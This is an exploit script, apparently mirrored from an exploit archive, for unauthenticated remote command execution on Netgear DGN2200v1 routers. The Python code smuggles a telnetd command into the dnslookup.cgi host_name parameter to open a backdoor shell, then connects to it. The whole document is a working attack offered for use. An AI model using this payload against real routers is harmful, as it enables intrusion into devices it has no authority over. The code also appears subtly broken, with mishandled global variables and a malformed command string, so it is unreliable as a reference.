Share
## https://sploitus.com/exploit?id=PACKETSTORM:163392
# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)  
# Date: 02.07.2021  
# Exploit Author: SivertPL  
# Vendor Homepage: https://www.netgear.com/  
# Version: All prior to v1.0.0.60  
  
#!/usr/bin/python  
  
"""  
NETGEAR DGN2200v1 Unauthenticated Remote Command Execution  
  
Author: SivertPL (kroppoloe@protonmail.ch)  
Date: 02.07.2021  
Status: Patched in some models  
Version: All prior to v1.0.0.60  
Impact: Critical   
  
CVE: No CVE number assigned  
PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365  
  
  
References:   
1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/  
2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1  
  
  
The exploit script only works on UNIX-based systems.  
  
This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past.  
This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol.  
  
"""  
  
import sys  
import requests  
import os  
  
target_ip = "192.168.0.1"  
telnet_port = 666  
sent = False  
  
def main():  
if len(sys.argv) < 3:  
print "./dgn2200_pwn.py <router ip> <backdoor-port>"  
exit()  
  
target_ip = sys.argv[1]  
telnet_port = int(sys.argv[2])  
print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..."  
send_payload()  
print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..."  
print "[!] If it fails to connect it means the target is probably not vulnerable"  
spawn_shell()  
  
def send_payload():  
try:  
requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true")  
sent = True  
except Exception:  
sent = False  
print "[-] Unknown error, target might not be vulnerable."  
  
def spawn_shell():  
if sent:  
print "[+] Dropping a shell..."  
os.system("telnet " + target_ip + " " + telnet_port)  
else:  
exit()  
  
  
if __name__ == "__main__":  
main()